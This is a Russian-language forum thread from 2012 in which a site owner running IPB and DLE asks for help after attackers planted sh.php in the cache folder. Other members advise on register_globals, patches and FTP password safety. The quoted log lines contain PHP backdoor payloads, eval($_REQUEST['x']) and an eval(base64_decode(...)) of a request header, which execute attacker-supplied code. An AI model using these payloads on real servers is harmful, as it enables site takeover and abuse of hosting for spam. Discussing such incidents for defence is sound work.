Пытаются взломать

[hybrid]

Ребят, подскажите что делать? Где искать дырку? Может в логах каких-то есть информация? Сегодня на хостинге обнаружил новый файл sh.php:

==============================================================================
========================= END ===================================
========================= /forum/index.php?%3C?eval($_REQUEST[%22x%22]);?%3E ===================================
==============================================================================
==============================================================================
========================= END ===================================
========================= /forum/index.php?%3C?eval($_REQUEST[%22x%22]);?%3E ===================================
==============================================================================

Файл лежал в папке cache. Ещё вчера его не было.

 

Вот ещё информация из eror_log:

 

[02-Nov-2010 22:04:11] PHP Fatal error:  Class 'db_driver_' not found in /home/name/public_html/forum/admin/sources/base/ipsRegistry.php on line 2376
[02-Nov-2010 22:04:24] PHP Fatal error:  Class 'db_driver_' not found in /home/name/public_html/forum/admin/sources/base/ipsRegistry.php on line 2376
[02-Nov-2012 05:27:03] PHP Catchable fatal error:  Object of class db_driver_mysql could not be converted to string in /home/name/public_html/forum/admin/sources/base/core.php on line 5583

[siv1987]

Пытаются, но пока видно что безуспешно. Что-то связана с записью логов. Надеюсь на хостинге отключены глобальные переменные?

 

Непонятно только кто это был, с одной стороны школота врядли бы до этого додумалась, с другой стороны странно что их остановил такой пустяк. Обязательно проверьте вышеуказанный параметр.

 

Зы.

То ли ибр взломали, то ли они сами подключили какой-то левый скрипт в начале кода, но меня постоянно редиректится страница.

[hybrid]

Пытаются, но пока видно что безуспешно. Что-то связана с записью логов. Надеюсь на хостинге отключены глобальные переменные?

 

Непонятно только кто это был, с одной стороны школота врядли бы до этого додумалась, с другой стороны странно что их остановил такой пустяк. Обязательно проверьте вышеуказанный параметр.

 

siv1987, если не трудно подскажите как проверить работу глобальных массивов? Я так понимаю, что если в php.ini прописано:

 

; register_globals to be on;  Using form variables as globals can easily lead

 

То они выключены? Если я отключу эти массивы не будет ли проблем с движком? У меня стоит ipb и dle. И главное где отключать лучше? Через .htaccess? Таких файлов целая куча в папках, я так понимаю нужно добавить строку в корневой?

[siv1987]

Посмотрите, нет ли там еще какой нибудь записи с register_globals где она включена.

Создайте в корне файл php с содержимом <?php phpinfo(); ?> и посмотрите какой значение у register_globals

[hybrid]

siv1987, выключено, хоть это радует. Не подскажите что ещё можно посмотреть. Может логи сервера или ещё что? Чтобы понять что они ломают и как?

[siv1987]

Что они ломают я вам сказал выше, нет смысла описывать инструкцию для школьников. Смотрите логи сервера, можно еще найдете какие запросы и к каким файлам они делали. Так же, если там находится ДЛЕ я бы посоветовал его поверить. Изменено 2 Ноября 2012 пользователем siv1987

[hybrid]

У меня все файлы проверяются на хостинге, если что-то новое добавляется, то я вкусе об этом.

[siv1987]

И да, еще не забудьте поставить последнюю заплатку безопасности с ипс.

[hybrid]

siv1987, дело в том, что все доступные заплатки для моей версии уже давно стоят. Ещё до взлома были. Сейчас переименовал админку, пусть помучается. Надо было давно переименовать её

 

Кстати, написал хостеру, хочу логи попросить. Интересно что в них будет.

 

Стоп, не все обновления стоят. Сейчас заметил, что в админке есть новое обновление, но оно не походит для русской версии ipb. Странно, почему здесь до сих пор нет обновлений? Может кроме этого обновления я пропустил ещё какие-то?

[Design_Nick]

Читай здесь: http://forums.ibresource.ru/index.php?/topic/64612/page__st__20#entry388882

[FatCat]

Школьники. Этому бекдору лет 10. Причем довести его до рабочего состояния - 1 замена имени переменной.

А дальше через эту мерзость инклюдится любой php файл; чаще всего инклюдят мейлер и делают спам-рассылку со взломанного хостинга.

И нужны тут не заплаты безопасности форума, а сканировать свой компьютер на троянов и менять пароль доступа к хостингу, явно же по ФТП каку положили.

[hybrid]

Design_Nick, ничего лично, но я пытаюсь вообще не ставить лишних модификаций из непроверенных источников. Видимо единственный вариант это обновить форум до последней версии.

 

 

FatCat, с чего вы взяли, что именно по фтп ломанули? Сейчас стоит filezilla и всё пароли в ней сохранены. Можно ли в обход программы получить доступ к паролям? Ещё слышал, что ftp дырявый протокол и нужно sftp пользоваться. Вот никак руки не доходили, может из-за этого протокола взломали? Вообще как защитить себя от подобного? Ведь рано или поздно, даже если вручную введу данные, их могут перехватить? При условии, что на компьютере троян? Какой у вас антивирус стоит? Что посоветуете?

[Vanger]

Брать фикс у IPB http://community.invisionpower.com/topic/371625-ipboard-31x-32x-and-33x-critical-security-update/

для 3.1.4 прикладываю правленый файлик http://narod.ru/disk/63338366001.4879d4e9418e62e0596033bd957ec7e9/core.php.html

[hybrid]

Ничего не поменялось,опять ломают, но теперь шелы уже добавляют. Ссылка на архив тут, может кто-то посмотрит файлы? Пароль на архив 123. Особенно интересует df.php. Он находится в зашифрованном виде. Что через него можно было сделать?

 

Да, и ломают точно не через фтп. Как-то по другому заливают. Я сегодня днем на хост добавил файл .ftpaccess c ограничением по ip. Так что этот вариант точно отпадает. Хотя есть ещё вариант, что я не правильно разместил этот файл. Нужно в корень хоста или в корень сайта? У меня сейчас он в корне хостинга находится.

 

Брать фикс у IPB http://community.inv...ecurity-update/

для 3.1.4 прикладываю правленый файлик http://narod.ru/disk...9/core.php.html

 

Я оттуда и брал, но это для английской версии и он не работает. А не из проверенных источников ставить не хочется.

 

Забыл ещё логи выложить, которые создает форум:

 

[04-Nov-2012 20:00:02] PHP Warning:  mysqli_query() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 230
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_error() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 626
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_errno() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 608
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_query() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 230
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_error() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 626
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_errno() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 608
[04-Nov-2012 20:00:02] PHP Catchable fatal error:  Object of class db_driver_mysql could not be converted to string in /home/name/public_html/forum/lp/sources/base/core.php on line 5583

 

Продолжение:

 

==============================================================================
=========================	    END	   ===================================
========================= /forum/index.php?%3C?print(md5(123456));eval(base64_decode($_SERVER[HTTP_A030F21C11]));exit;?%3E ===================================
==============================================================================

[Vanger]

Ничего не поменялось,опять ломают, но теперь шелы уже добавляют. Ссылка на архив тут, может кто-то посмотрит файлы? Пароль на архив 123. Особенно интересует df.php. Он находится в зашифрованном виде. Что через него можно было сделать?

 

Да, и ломают точно не через фтп. Как-то по другому заливают. Я сегодня днем на хост добавил файл .ftpaccess c ограничением по ip. Так что этот вариант точно отпадает. Хотя есть ещё вариант, что я не правильно разместил этот файл. Нужно в корень хоста или в корень сайта? У меня сейчас он в корне хостинга находится.

 

Брать фикс у IPB http://community.inv...ecurity-update/

для 3.1.4 прикладываю правленый файлик http://narod.ru/disk...9/core.php.html

 

Я оттуда и брал, но это для английской версии и он не работает. А не из проверенных источников ставить не хочется.

 

Забыл ещё логи выложить, которые создает форум:

 

[04-Nov-2012 20:00:02] PHP Warning:  mysqli_query() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 230
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_error() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 626
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_errno() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 608
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_query() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 230
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_error() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 626
[04-Nov-2012 20:00:02] PHP Warning:  mysqli_errno() expects parameter 1 to be mysqli, null given in /home/name/public_html/forum/ips_kernel/classDbMysqliClient.php on line 608
[04-Nov-2012 20:00:02] PHP Catchable fatal error:  Object of class db_driver_mysql could not be converted to string in /home/name/public_html/forum/lp/sources/base/core.php on line 5583

 

Продолжение:

 

==============================================================================
=========================		END	   ===================================
========================= /forum/index.php?%3C?print(md5(123456));eval(base64_decode($_SERVER[HTTP_A030F21C11]));exit;?%3E ===================================
==============================================================================

Это нормальное поведение, а по поводу источников возмите и сравните 2 файла по содержимоу, тот который привел и английскую версию. Будут добавки только VK.Com и куски русских ошибок.

[Arhar]

Сейчас стоит filezilla и всё пароли в ней сохранены

это, например, как положить паспорт на подоконник в подъезде

пароли вообще сохранять нельзя

[FatCat]

Набивать с руки чтобы перехватили кейлогером?

[siv1987]

Arhar, когда собираетесь удалить этот стремный скрипт?

 

Он находится в зашифрованном виде. Что через него можно было сделать?

 

Модно было сделать все.

 

А не из проверенных источников ставить не хочется.

http://ipbskins.ru/forum/topic10765.html

А форум у вас из каких "источников"?

[hybrid]

А форум у вас из каких "источников"?

Лицензия стоит ibresource. Но дело в том, что пол года закончились уже и невозможно скачать обновления. Если бы это был какой-то ломаный форум, я бы просто скачал новую версию.

[Arhar]

в режиме параноика - набивать только виртуальной клавиатурой, как сделано в интернет-банке Росбанка

я никуя не уберу поскольку ниразу не сотрудник ИБРесурс, это обсуждалось уже 100 раз 500 лет подряд

[foxx77]

таже фигня, теже файлы в кеше

 

siv1987, дело в том, что все доступные заплатки для моей версии уже давно стоят. Ещё до взлома были. Сейчас переименовал админку, пусть помучается. Надо было давно переименовать её

 

 

админка обеаруживается и в 3.3.4

Изменено 17 Ноября 2012 пользователем foxx77

[Design_Nick]

Design_Nick, ничего лично, но я пытаюсь вообще не ставить лишних модификаций из непроверенных источников. Видимо единственный вариант это обновить форум до последней версии.

Я не понял причем здесь "посторонние источники" Там официальные заплатки.